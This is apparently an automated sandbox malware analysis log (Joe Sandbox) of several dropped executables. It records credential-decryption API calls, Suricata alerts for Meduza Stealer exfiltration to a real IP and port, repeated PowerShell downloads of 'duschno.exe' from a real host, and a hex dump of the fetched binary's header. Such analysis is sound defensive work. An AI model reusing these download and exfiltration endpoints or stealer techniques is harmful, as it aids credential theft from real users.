Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A983C0 BCryptCloseAlgorithmProvider,_invalid_parameter_noinfo_noreturn,	29_2_00007FF786A983C0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A97BA0 CryptUnprotectData,LocalFree,	29_2_00007FF786A97BA0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A98440 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,	29_2_00007FF786A98440
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A57C20 CryptUnprotectData,LocalFree,_invalid_parameter_noinfo_noreturn,	29_2_00007FF786A57C20
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A53A30 BCryptDestroyKey,	29_2_00007FF786A53A30

Source: iviewers.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49739 version: TLS 1.2

Source: iviewers.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218CB500 FindClose,FindFirstFileExW,GetLastError,	26_2_00007FF6218CB500
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218CB5B0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,	26_2_00007FF6218CB5B0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AFB500 FindClose,FindFirstFileExW,GetLastError,GetCurrentDirectoryW,GetLastError,	27_2_00007FF741AFB500
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AFB5B0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,GetLastError,GetFileAttributesW,__std_fs_open_handle,CloseHandle,	27_2_00007FF741AFB5B0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A76DB0 FindFirstFileW,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	27_2_00007FF741A76DB0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE96DB0 FindFirstFileW,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	28_2_00007FF7CEE96DB0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEF1B5B0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,GetLastError,GetFileAttributesW,__std_fs_open_handle,CloseHandle,	28_2_00007FF7CEF1B5B0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEF1B500 FindClose,FindFirstFileExW,GetLastError,GetCurrentDirectoryW,GetLastError,	28_2_00007FF7CEF1B500
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786ADB5B0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,GetLastError,GetFileAttributesW,__std_fs_open_handle,CloseHandle,	29_2_00007FF786ADB5B0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A56DB0 FindFirstFileW,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	29_2_00007FF786A56DB0
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786ADB500 FindClose,FindFirstFileExW,GetLastError,GetCurrentDirectoryW,GetLastError,	29_2_00007FF786ADB500

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Code function: 26_2_00007FF6218973F0 GetLogicalDriveStringsW,_invalid_parameter_noinfo_noreturn,

26_2_00007FF6218973F0

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: D:\sources\migration\
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: D:\sources\replacementmanifests\
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: D:\sources\migration\wtr\
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: D:\sources\replacementmanifests\hwvid-migration-2\

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049441 - Severity 1 - ET MALWARE Win32/Unknown Grabber Base64 Data Exfiltration Attempt : 192.168.2.4:49737 -> 193.3.19.151:15666
Source: Network traffic	Suricata IDS: 2050806 - Severity 1 - ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M2 : 192.168.2.4:49737 -> 193.3.19.151:15666

Source: global traffic

TCP traffic: 192.168.2.4:49737 -> 193.3.19.151:15666

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 07:52:36 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 09 Dec 2024 20:28:42 GMTETag: "13ba00-628dc35e76e87"Accept-Ranges: bytesContent-Length: 1292800Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 4e af 37 82 2f c1 64 82 2f c1 64 82 2f c1 64 c9 57 c6 65 83 2f c1 64 c9 57 c7 65 83 2f c1 64 ca aa c5 65 9b 2f c1 64 92 ab c2 65 8a 2f c1 64 92 ab c5 65 92 2f c1 64 92 ab c4 65 e0 2f c1 64 c9 57 c4 65 38 2f c1 64 c9 57 c2 65 85 2f c1 64 c9 57 c5 65 97 2f c1 64 82 2f c0 64 a5 2e c1 64 c9 57 c0 65 9d 2f c1 64 c9 aa c8 65 9d 2f c1 64 c9 aa 3e 64 83 2f c1 64 c9 aa c3 65 83 2f c1 64 52 69 63 68 82 2f c1 64 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 9d 37 3b 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 34 0d 00 00 a6 06 00 00 00 00 00 20 f2 0a 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 14 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 df 12 00 40 01 00 00 00 f0 13 00 e0 01 00 00 00 80 13 00 18 6c 00 00 00 00 00 00 00 00 00 00 00 00 14 00 3c 0d 00 00 d0 83 11 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 85 11 00 28 00 00 00 90 82 11 00 40 01 00 00 00 00 00 00 00 00 00 00 00 50 0d 00 78 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 32 0d 00 00 10 00 00 00 34 0d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 a8 05 00 00 50 0d 00 00 aa 05 00 00 38 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 7c 00 00 00 00 13 00 00 5a 00 00 00 e2 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 18 6c 00 00 00 80 13 00 00 6e 00 00 00 3c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 f0 13 00 00 02 00 00 00 aa 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 0d 00 00 00 00 14 00 00 0e 00 00 00 ac 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 07:52:36 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 09 Dec 2024 20:28:42 GMTETag: "13ba00-628dc35e76e87"Accept-Ranges: bytesContent-Length: 1292800Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 4e af 37 82 2f c1 64 82 2f c1 64 82 2f c1 64 c9 57 c6 65 83 2f c1 64 c9 57 c7 65 83 2f c1 64 ca aa c5 65 9b 2f c1 64 92 ab c2 65 8a 2f c1 64 92 ab c5 65 92 2f c1 64 92 ab c4 65 e0 2f c1 64 c9 57 c4 65 38 2f c1 64 c9 57 c2 65 85 2f c1 64 c9 57 c5 65 97 2f c1 64 82 2f c0 64 a5 2e c1 64 c9 57 c0 65 9d 2f c1 64 c9 aa c8 65 9d 2f c1 64 c9 aa 3e 64 83 2f c1 64 c9 aa c3 65 83 2f c1 64 52 69 63 68 82 2f c1 64 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 9d 37 3b 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 34 0d 00 00 a6 06 00 00 00 00 00 20 f2 0a 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 14 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 df 12 00 40 01 00 00 00 f0 13 00 e0 01 00 00 00 80 13 00 18 6c 00 00 00 00 00 00 00 00 00 00 00 00 14 00 3c 0d 00 00 d0 83 11 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 85 11 00 28 00 00 00 90 82 11 00 40 01 00 00 00 00 00 00 00 00 00 00 00 50 0d 00 78 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 32 0d 00 00 10 00 00 00 34 0d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 a8 05 00 00 50 0d 00 00 aa 05 00 00 38 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 7c 00 00 00 00 13 00 00 5a 00 00 00 e2 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 18 6c 00 00 00 80 13 00 00 6e 00 00 00 3c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 f0 13 00 00 02 00 00 00 aa 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 0d 00 00 00 00 14 00 00 0e 00 00 00 ac 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 07:52:36 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 09 Dec 2024 20:28:42 GMTETag: "13ba00-628dc35e76e87"Accept-Ranges: bytesContent-Length: 1292800Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 4e af 37 82 2f c1 64 82 2f c1 64 82 2f c1 64 c9 57 c6 65 83 2f c1 64 c9 57 c7 65 83 2f c1 64 ca aa c5 65 9b 2f c1 64 92 ab c2 65 8a 2f c1 64 92 ab c5 65 92 2f c1 64 92 ab c4 65 e0 2f c1 64 c9 57 c4 65 38 2f c1 64 c9 57 c2 65 85 2f c1 64 c9 57 c5 65 97 2f c1 64 82 2f c0 64 a5 2e c1 64 c9 57 c0 65 9d 2f c1 64 c9 aa c8 65 9d 2f c1 64 c9 aa 3e 64 83 2f c1 64 c9 aa c3 65 83 2f c1 64 52 69 63 68 82 2f c1 64 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 9d 37 3b 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 34 0d 00 00 a6 06 00 00 00 00 00 20 f2 0a 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 14 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 df 12 00 40 01 00 00 00 f0 13 00 e0 01 00 00 00 80 13 00 18 6c 00 00 00 00 00 00 00 00 00 00 00 00 14 00 3c 0d 00 00 d0 83 11 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 85 11 00 28 00 00 00 90 82 11 00 40 01 00 00 00 00 00 00 00 00 00 00 00 50 0d 00 78 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 32 0d 00 00 10 00 00 00 34 0d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 a8 05 00 00 50 0d 00 00 aa 05 00 00 38 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 7c 00 00 00 00 13 00 00 5a 00 00 00 e2 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 18 6c 00 00 00 80 13 00 00 6e 00 00 00 3c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 f0 13 00 00 02 00 00 00 aa 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 0d 00 00 00 00 14 00 00 0e 00 00 00 ac 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 07:52:37 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 09 Dec 2024 20:28:42 GMTETag: "13ba00-628dc35e76e87"Accept-Ranges: bytesContent-Length: 1292800Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 4e af 37 82 2f c1 64 82 2f c1 64 82 2f c1 64 c9 57 c6 65 83 2f c1 64 c9 57 c7 65 83 2f c1 64 ca aa c5 65 9b 2f c1 64 92 ab c2 65 8a 2f c1 64 92 ab c5 65 92 2f c1 64 92 ab c4 65 e0 2f c1 64 c9 57 c4 65 38 2f c1 64 c9 57 c2 65 85 2f c1 64 c9 57 c5 65 97 2f c1 64 82 2f c0 64 a5 2e c1 64 c9 57 c0 65 9d 2f c1 64 c9 aa c8 65 9d 2f c1 64 c9 aa 3e 64 83 2f c1 64 c9 aa c3 65 83 2f c1 64 52 69 63 68 82 2f c1 64 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 9d 37 3b 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 34 0d 00 00 a6 06 00 00 00 00 00 20 f2 0a 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 14 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 df 12 00 40 01 00 00 00 f0 13 00 e0 01 00 00 00 80 13 00 18 6c 00 00 00 00 00 00 00 00 00 00 00 00 14 00 3c 0d 00 00 d0 83 11 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 85 11 00 28 00 00 00 90 82 11 00 40 01 00 00 00 00 00 00 00 00 00 00 00 50 0d 00 78 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 32 0d 00 00 10 00 00 00 34 0d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 a8 05 00 00 50 0d 00 00 aa 05 00 00 38 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 7c 00 00 00 00 13 00 00 5a 00 00 00 e2 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 18 6c 00 00 00 80 13 00 00 6e 00 00 00 3c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 f0 13 00 00 02 00 00 00 aa 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 0d 00 00 00 00 14 00 00 0e 00 00 00 ac 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Accept: text/html; text/plain; */*Host: api.ipify.orgCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 193.3.19.151 193.3.19.151

Source: Joe Sandbox View	ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox View	ASN Name: ARNES-NETAcademicandResearchNetworkofSloveniaSI ARNES-NETAcademicandResearchNetworkofSloveniaSI

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic

Suricata IDS: 2050807 - Severity 1 - ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP) : 192.168.2.4:49737 -> 193.3.19.151:15666

Source: global traffic	HTTP traffic detected: GET /duschno.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.47.15Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /duschno.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.47.15Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /duschno.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.47.15Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /duschno.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.47.15Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.15

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Code function: 26_2_00007FF621895240 InternetOpenA,InternetOpenUrlA,HttpQueryInfoW,HttpQueryInfoW,InternetQueryDataAvailable,InternetReadFile,InternetQueryDataAvailable,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,

26_2_00007FF621895240

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: text/html; text/plain; /Host: api.ipify.orgCache-Control: no-cache
